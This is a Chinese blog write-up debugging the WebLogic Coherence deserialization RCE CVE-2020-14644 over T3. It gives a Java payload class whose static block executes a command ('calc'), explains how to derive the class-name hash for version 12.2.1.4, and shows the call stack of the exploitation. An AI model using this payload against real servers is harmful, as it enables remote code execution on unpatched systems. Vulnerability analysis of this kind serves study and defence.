[CVE-2020-14644]weblogic coherence 反序列化RCE via t3
参考:
- CVE-2020-14644 分析与 gadget 的一些思考
- Weblogic 远程命令执行漏洞(CVE-2020-14644)分析
漏洞调试
com.tangosol.internal.util.invoke.RemotableSupport
![[CVE-2020-14644]weblogic coherence 反序列化RCE via t3_第1张图片](http://img.e-com-net.com/image/info8/909e8b8dce5e49bb97586e17ed152b7c.jpg)
com.tangosol.internal.util.invoke.RemoteConstructor
![[CVE-2020-14644]weblogic coherence 反序列化RCE via t3_第2张图片](http://img.e-com-net.com/image/info8/cc87ac1175e447f6ba0c75ed96a21eab.jpg)
使用作者给出的(12.2.1.3版本的?)这个md5值:E12ECA49F06D0401A9D406B2DCC7463A抛出了异常
java.lang.NoClassDefFoundError: com/tangosol/internal/util/invoke/lambda/LambdaIdentity$423B02C050017B24DB10DFF759AA56BF (wrong name: com/tangosol/internal/util/invoke/lambda/LambdaIdentity$E12ECA49F06D0401A9D406B2DCC7463A)
意思是423B02C050017B24DB10DFF759AA56BF才正确?
于是通过12.2.1.4的coherence.jar中的LambdaIdentity生成了新的md5值。果然与之前报错的吻合。
![[CVE-2020-14644]weblogic coherence 反序列化RCE via t3_第3张图片](http://img.e-com-net.com/image/info8/11cac98f7f184a3c8ba7f2fe9bed027e.jpg)
于是重新生成payload。新建package:com.tangosol.internal.util.invoke.lambda,然后新建类:LambdaIdentity$423B02C050017B24DB10DFF759AA56BF,编译。拿到其class文件的路径。
package com.tangosol.internal.util.invoke.lambda;
import java.io.IOException;
public class LambdaIdentity$423B02C050017B24DB10DFF759AA56BF {
public LambdaIdentity$423B02C050017B24DB10DFF759AA56BF() {
}
static {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException var1) {
var1.printStackTrace();
}
}
}
加载class只有一次机会,首次成功或者失败之后,第二次都无法成功了。
(重启weblogic)
![[CVE-2020-14644]weblogic coherence 反序列化RCE via t3_第4张图片](http://img.e-com-net.com/image/info8/8f7ca868e6b449b98714acc1d6c66260.gif)
pocsuite:
![[CVE-2020-14644]weblogic coherence 反序列化RCE via t3_第5张图片](http://img.e-com-net.com/image/info8/d1cfb78db3c342de90a9d64b3937d6b7.jpg)
在这一步执行了我们自定义类的static代码块:
Remotable<T> instance = (Remotable)definition.createInstance(constructor.getArguments());
实现命令执行。
当然先前的准备工作是得先定义这个类,
其调用栈:
...
defineClass:642, ClassLoader (java.lang)
defineClass:181, RemotableSupport (com.tangosol.internal.util.invoke)
realize:137, RemotableSupport (com.tangosol.internal.util.invoke)
newInstance:122, RemoteConstructor (com.tangosol.internal.util.invoke)
readResolve:233, RemoteConstructor (com.tangosol.internal.util.invoke)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadResolve:1248, ObjectStreamClass (java.io)
readOrdinaryObject:2076, ObjectInputStream (java.io)
readObject0:1571, ObjectInputStream (java.io)
readObject:431, ObjectInputStream (java.io)
readObject:73, InboundMsgAbbrev (weblogic.rjvm)
read:45, InboundMsgAbbrev (weblogic.rjvm)
readMsgAbbrevs:325, MsgAbbrevJVMConnection (weblogic.rjvm)
init:219, MsgAbbrevInputStream (weblogic.rjvm)
dispatch:557, MsgAbbrevJVMConnection (weblogic.rjvm)
dispatch:666, MuxableSocketT3 (weblogic.rjvm.t3)
dispatch:397, BaseAbstractMuxableSocket (weblogic.socket)
readReadySocketOnce:993, SocketMuxer (weblogic.socket)
readReadySocket:929, SocketMuxer (weblogic.socket)
process:599, NIOSocketMuxer (weblogic.socket)
processSockets:563, NIOSocketMuxer (weblogic.socket)
run:30, SocketReaderRequest (weblogic.socket)
execute:43, SocketReaderRequest (weblogic.socket)
execute:147, ExecuteThread (weblogic.kernel)
run:119, ExecuteThread (weblogic.kernel)
抛出报错:
java.lang.ClassCastException: com.tangosol.internal.util.invoke.lambda.LambdaIdentity$423B02C050017B24DB10DFF759AA56BF cannot be cast to com.tangosol.internal.util.invoke.Remotable
![[CVE-2020-14644]weblogic coherence 反序列化RCE via t3_第6张图片](http://img.e-com-net.com/image/info8/8746eb61c62f4a3eb3ec67d43bab9cc9.jpg)